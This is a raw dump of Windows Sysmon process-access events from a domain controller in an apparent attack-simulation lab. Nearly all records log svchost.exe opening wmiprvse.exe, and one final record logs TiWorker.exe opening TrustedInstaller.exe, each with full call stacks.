12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.128{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 